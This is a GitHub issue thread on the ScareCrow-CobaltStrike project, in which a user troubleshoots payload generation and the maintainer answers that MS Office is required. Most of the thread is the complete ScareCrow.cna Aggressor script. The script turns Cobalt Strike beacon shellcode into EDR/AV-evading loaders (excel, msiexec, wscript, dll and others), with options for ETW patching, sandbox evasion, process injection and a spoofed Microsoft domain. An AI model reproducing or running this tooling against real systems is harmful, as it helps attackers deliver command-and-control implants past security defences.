GeorgePatsias / ScareCrow-CobaltStrike

Cobalt Strike script for ScareCrow payloads integration (EDR/AV evasion)
MIT License

not sure where to go from .bins #6

Closed tgelliott196 closed 2 years ago

tgelliott196 commented 2 years ago

So every payload is a .bin for me, except the dll, which doesn't work for me.
Don't know what I'm doing wrong. Installed on Kali, changed paths, loaded the cna, don't know what else to do.

screenshots.docx

GeorgePatsias commented 2 years ago

Hey, try not to change the name when saving the beacon and let me know if that works with you

tgelliott196 commented 2 years ago

> Hey, try not to change the name when saving the beacon, and let me know if that works with you

I'm not changing the name. I click listener, leave stageless (choices to pick from: binary, control, dll, excel, msiexec, or wscript); the choice to output x86 exe or x64 exe is not an option. Then I leave the default domain of www.microsoft.com and click generate. It asks me for a loader name. I leave it blank because I'm not sure what to do here, and I click generate. No matter which file type I pick, minus .dll, it makes a beacon called scbeacon.bin. I thought it was supposed to generate an exe, create an Excel doc, an msi, a wscript script, or an Excel macro. Not sure where to go from scbeacon.bin or what to do with it. Or am I missing part of the install or something else?

GeorgePatsias commented 2 years ago

Did you follow the installation guide, and the extra packages needed to do that? Also the configuration? Share your cna script with me. Also, are you doing the excel loader from Linux?

tgelliott196 commented 2 years ago

> Did you follow the installation guide, and the extra packages needed to do that? Also the configuration? Share your cna script with me. Also, are you doing the excel loader from Linux?

I did a git clone and followed the readme to run install.sh, and changed the config paths. Since it was an install.sh, I installed on Linux. Yes, I'm trying to do the excel loader from Linux because that is where I have CS and ScareCrow-CS installed.

```
############################################################
# Please do not use / at the end of the directories!
############################################################

# Path to the ScareCrow-CobaltStrike repository you just cloned.
$script_path = "/opt/scarecrows/ScareCrow-CobaltStrike";

# Path to the compiled ScareCrow Go executable of the installation.
$scarecrow_executable = "/opt/scarecrows/ScareCrow-CobaltStrike/ScareCrow";

# Path to the CobaltStrike directory.
$cs_directory = "/opt/cobaltstrike";

# Path to the python3 binary.
$python3 = "/usr/bin/python3";
############################################################

$loader = "";
$domain = "";
$etw = "";
$sandbox = "";
$custom_bin = "";
$loader_name = "";
$shellcode = "";
$injection = "";

menubar("ScareCrow", "scare_crow");

popup scare_crow {
    item "&Generate Payload" {
        ScareCrow();
    }
}

sub ScareCrow {
    local('$dialog %defaults');
    %defaults["domain"] = "www.microsoft.com";

    $dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &mainCallback);
    dialog_description($dialog, "Generate EDR evasion payloads. (#) for optional, (*) for required options.");
    drow_listener_stage($dialog, "listener", "(*) Listener: ");
    drow_file($dialog, "custom_binary", "(#) Custom x64 Shellcode: ");
    drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless"));
    drow_combobox($dialog, "architecture", "(*) Architecture: ", @("x64"));
    drow_combobox($dialog, "loader", "(*) Loader: ", @("binary", "control", "dll", "excel", "msiexec", "wscript"));
    drow_checkbox($dialog, "etw", "(#) Disable ETW patching (enabled by default)");
    drow_checkbox($dialog, "sandbox", "(#) Sandbox evasion");
    drow_text($dialog, "injection", "(#) Process Injection: ");
    drow_text($dialog, "domain", "(*) Domain: ");
    dbutton_action($dialog, "Generate Payload");
    dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
    dialog_show($dialog);
}

sub loaderDialog {
    local('$dialog %defaults');

    $dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &loaderDialogCallback);
    dialog_description($dialog, "Specify JScript loader name for the payload e.g. Loader.js - (**Optional For Control payloads)");
    drow_text($dialog, "loader_name", "Loader name: ");
    dbutton_action($dialog, "Generate");
    dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
    dialog_show($dialog);
}

sub loaderDialogCallback {
    $loader_name = $3["loader_name"];
    GeneratePayload();
}

sub mainCallback {
    if ($3["listener"] eq "") {
        show_message("No listener specified!");
        exit();
    }

    $loader = $3["loader"];
    $domain = $3["domain"];
    $etw = $3["etw"];
    $sandbox = $3["sandbox"];
    $custom_bin = $3["custom_binary"];
    $injection = $3["injection"];

    if ($injection ne "" && $etw eq "false") {
        show_message("Cannot use Process Injection and ETW patching together. Disable ETW patching if you want to do a Process Injection");
        exit();
    }

    if ($custom_bin ne "") {
        $shellcode_file = openf($custom_bin);
        $shellcode = readb($shellcode_file, -1);
        closef($shellcode_file);
    } else {
        $shellcode = artifact_payload($3["listener"], "raw", $3["architecture"]);
    }

    if ($loader eq "binary") {
        GeneratePayload();
    } else if ($loader eq "dll") {
        GeneratePayload();
    } else if ($loader eq "control") {
        loaderDialog();
    } else if ($loader eq "excel") {
        loaderDialog();
    } else if ($loader eq "msiexec") {
        loaderDialog();
    } else if ($loader eq "wscript") {
        loaderDialog();
    }
}

sub GeneratePayload {
    prompt_file_save("scbeacon.bin", {
        show_message("Generating payload, please wait... You can close this dialog while you wait.");

        $handle = openf(">" . $1);
        writeb($handle, $shellcode);
        closef($handle);

        $data = exec($python3 . " " . $script_path . "/Helper.py" . " " . $scarecrow_executable . " " . $1 . " " . $loader . " " . $domain . " " . $cs_directory . " " . $etw . " " . $sandbox . " " . $injection . " " . $loader_name);
        $pythondata = readAll($data);

        show_message("Executable saved to: " . $pythondata);
    });
}

println("\n\c9[+]\o Loaded ScareCrow.cna!");
println("\c8[!]\o \$script_path set to '\U$script_path\U'");
println("\c8[!]\o \$scarecrow_executable set to '\U$scarecrow_executable\U'");
println("\c8[!]\o \$cs_directory set to '\U$cs_directory\U'");
```

GeorgePatsias commented 2 years ago

It needs Excel on your system to work.

tgelliott196 commented 2 years ago

I guess I was confused because the install file is install.sh. So, for this to work, Cobalt Strike, BASH, and MS Office need to be installed on Windows? Or will it work with LibreOffice?

GeorgePatsias commented 2 years ago

MS Office. Read your tools.

tgelliott196 commented 2 years ago

Unfortunately, work only gave me the Cobalt Strike install for Linux, and Office is only compatible with Windows, Mac, and Android.
